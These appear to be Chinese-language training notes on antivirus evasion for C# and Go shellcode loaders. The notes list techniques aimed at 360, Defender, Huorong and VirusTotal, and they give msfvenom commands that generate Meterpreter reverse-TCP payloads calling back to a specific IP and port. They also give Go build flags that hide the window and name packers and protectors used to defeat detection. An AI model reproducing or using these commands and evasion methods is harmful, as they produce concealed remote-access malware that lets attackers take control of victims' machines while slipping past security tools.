知識點
#知識點:
1、C#-混淆&分離&反除錯
2、GO-混淆&分離&反除錯
3、成品程式-包含反除錯VT
#章節點:
編譯程式碼面-ShellCode-混淆
編譯程式碼面-編輯執行器-編寫
編譯程式碼面-分離載入器-編寫
程式檔案面-特徵碼定位-修改
程式檔案面-加殼花指令-資源
程式碼載入面-Dll反射劫持-載入
許可權邏輯面-防毒程序干擾-結束
工具資料面-通訊記憶體流量-動態
對抗目標:
X60 Defender 某絨 管家 VT等
程式語言:
C/C++ Python C# Go Powershell Ruby Java ASM等
涉及技術:
ShellCode混淆加密,無檔案落地,分離拆分,白名單,DLL載入,Syscall,加殼加花,
資源修改,特徵修改,二次開發CS,記憶體休眠,程序注入,反沙盒,反除錯,CDN解析等
演示案例
1、C#&NET-ShellCode-原型&混淆
2、GO-ShellCode-原型&混淆&分離
3、C#&GO-成品程式-保護反除錯VT
.NET
1、原型
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=6688 -e x86/shikata_ga_nai -i 15 -f csharp
2、混淆
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=6688 -f csharp
3、檔案混淆-反除錯VT
開源-ConfuserEx
付費-VirboxProtector
Golang
-執行1.go指令碼
go run 1.go
-編譯1.go指令碼
go build 1.go
-沒有彈窗的exe命令編譯:
go build -ldflags="-H windowsgui -w -s" 1.go
1、Golang-Shellcode編譯-1.go
2、Golang-編碼加密-Xor&Aes混淆-2&3.go
Xor Aes Base64 引數提交
3、Golang-分離式載入器-引數&資源-4&5.go
加上去特徵&引數分離
cs或msf生成raw格式-4.go
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=6688 -f hex
go build -ldflags "-s -w -H=windowsgui" 5.go
4、Golang-保護混淆反偵錯程式-通用
SafengineShielden